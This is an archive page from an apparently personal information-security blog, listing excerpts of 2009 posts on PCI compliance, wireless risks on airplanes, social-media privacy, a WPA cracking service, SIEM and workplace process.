Categories ArchivesEnterprise Security

The Best of 2009 standard

2009 was an interesting year for all of us in information security.  We lived through one of the largest breaches in our short history on this spinning blue ball eclipsed only by the inauguration of a unique president-elect.  Anton Chuvakin & I published a book.  I moved my blog here amidst a divestiture of my business at VeriSign.  Apple released a new version of their operating system and a new iPhone.  MasterCard went all crazy on us. I wanted to take the opportunity to thank all of you for an amazing 2009, and I’m looking forward to fantastic things in 2010! Here are the five most popular posts in 2009: Upgrading to Snow Leopard. Ironically enough, the most popular post ...

Continue Reading

Wireless On a Plane? standard

Airplane light, by Tambako the Jaguar
Go-go-gadget WI-FI ON A PLANE! I imagine that the next two weeks will see a significant amount of Wi-Fi trials or sales as parents and children alike take to the skies to visit loved ones over the holidays.  While I am sure it has happened already, you don’t find too many documented cases of wireless attacks happening on airplanes.  There are a couple of ways that attacks can happen. The first attack does not even require an internet connection, just a lazy passenger that does not follow their airline’s electronic device policy.  I’ve seen tons of weary road warriors working on their laptops without removing their 3G data card or with that little Wi-Fi light blinking furiously.  While going after ...

Continue Reading

Hackers Love Social Media standard

USA Today published a great article on Monday about search engines now beginning to index various types of social media.  Bad guys now have even more ways to correlate information and with less of our lives being private (albeit by choice), it makes those stupid security things we do even more relevant. Last month’s Herding Cats tackled Privacy, and specifically the expectation of privacy for future generations.  Social media addicts have the ability to tell the world exactly where they are, what they are doing, and show them visual or auditory evidence by posting geo-tagged videos or audio.   Now add in a near real-time index of this stuff, and you can see how much more powerful (and scary) social ...

Continue Reading

Craking as a Service (Caas)? standard

This is not a new concept, and has even been discussed here before.  PC World is reporting that a new service is available for all of us.  Have a WPA PSK you want to crack?  It will cost you $34 and about 20 minutes. WPA Cracker is a new service launched by the same researcher that has spent time attacking SSL/TLS over the last few years.  While the price may be a little high, it certainly represents an interesting shift in activities typically reserved for botnets or universities with large computing resources.  Where else could we take this? Rainbow tables for most hash types are readily available through Bit Torrent, or can be generated with simple scripts and a chunk ...

Continue Reading

SIEM and VOIP standard

What in the world are those two topics doing in the same post?  Well, I’ve got a small roll-up for you.  Here are two blog posts you should read.  Both are short and relevant, exactly what most of us like! The first is a post from my co-author Anton Chuvakin entitled Log Management + SIEM = ?, a post that lays out four scenarios where SIEM and LM can be combined as part of the technology deployment of a security strategy.  This field is something that I’m enjoying watching grow, and in fact my new employer plays in the space.  Log management and SIEM are both critical functions to any security environment.  While mature installations may not be able to ...

Continue Reading

Consider Outsourcing Cashless Payments standard

One of the things that baffles me every time I walk into a retailer struggling with PCI compliance is why management doesn’t consider completely outsourcing all of their cashless payment processing.  I know how we ended up in this situation, but who takes the blame for continuing to push this paradigm forward? Let’s take payments off the table and re-focus on the information we store. Information today is the lifeblood of business.  The value of information is in the process of distilling petabytes of information into actionable tasks that create competitive advantage.  Because information is perceived as highly valuable, the general position of information managers is “store or get access to every piece you can, then we’ll figure out how ...

Continue Reading

The Gobble-Gobble of Public Networks standard

Here in the US we celebrate and give thanks for the harvest on the fourth Thursday of November, one month after our Canadian brethren did.  Does security stop just because most companies in the US are closed?  Nope, in fact, I’d like to give a shout out to all of you folks taking the overtime pay to spend time babysitting your networks.  For you, I am thankful. The PCI Europe meeting has been the topic of several blog posts recently, and here’s yet another one inspired by the Q/A session at that meeting. The Technical Working Group (TWG) must cringe when the definition of public networks is asked in a crowd.  I believe that this was one of those phrases ...

Continue Reading

Multi-Function Service Providers, What To Do? standard

Service providers have dealt with compliance-driven information security mandates for much longer than merchant’s have.  The catalyst for Visa’s CISP program was reportedly service providers, but enforcement ultimately expanded to all stakeholders.  Regardless of its origins, a certain class of service provider has significant challenges complying with these requirements without shuttering portions of their business. Let’s say that a financial service provider is processing credit card transactions as an acqurier, as well as doing issuer processing for other third-party banks.  How can the business comply with PCI if they also must store prohibited data in order to process on behalf of their issuer customers? That, my friends, is one of the big questions in the industry today. Attendees from both ...

Continue Reading

Herding Cats November: got sprintf()? standard

Ahh, everyone loves some good programming humor, right? RIGHT?!? Yeah, that’s what I thought.  This month I talk about one of the hardest tech jobs out there… the Application Developer.  I used to be one, and I remember the stress of getting projects completed on time, under budget, and with minimal bugs.  It’s a thankless job. So go check out this month’s edition of Herding Cats here! Possibly Related Posts: Level Up Cybersecurity with Kasm Workspaces Let’s Encrypt for non-webservers Selective Domain Filtering with Postfix and a SPAM Filtering Service Preventing Account Takeover, Enable MFA! Proofpoint Patches URL Sandbox Bypass Bug

Continue Reading

Too Much Process, the Corporate Lobotomy standard

Process is a good thing. Some corporate citizens might disagree with that basic statement based on conversations like the following: “You mean I have to go to some website to enter a request for paper clips, and then someone in another office can just reject it because they want to?” Sometimes it doesn’t work.  When you are in situations like this, remember this little saying from a very wise man: “Don’t confuse logic with the process.” Process in other examples can be a really good thing.  Consider the actions you might take to promote code from a test or Q/A environment into production.  The steps you take to do this should be the same every time, and any deviation from ...

Continue Reading

This is a unique website which will require a more modern browser to work!

Please upgrade today!